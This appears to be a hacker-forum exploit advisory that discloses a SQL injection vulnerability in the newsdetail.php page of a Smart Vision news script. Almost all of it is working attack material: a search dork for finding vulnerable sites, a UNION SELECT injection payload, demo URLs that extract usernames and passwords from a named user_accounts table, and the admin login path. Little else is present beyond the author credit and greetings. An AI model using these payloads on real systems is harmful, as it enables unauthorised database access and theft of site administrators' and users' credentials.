============================================
| Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
============================================
# (+) Author: Err0R
# (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
# (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
=====================================
~~~~~~~~~~~~~~~~~~~
dork : Come from home Script ( Latest Project ) www.esmart-vision.com<http://www.esmart-vision.com/>
~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--
And you come the enject ,,
Demo :-
User name : http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
Password : http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http:http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
admin Login : Site /path/admin/admin.php
=============================================================
#====GreeTZ===================#
#all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
#and all in My email : ) #
#============================#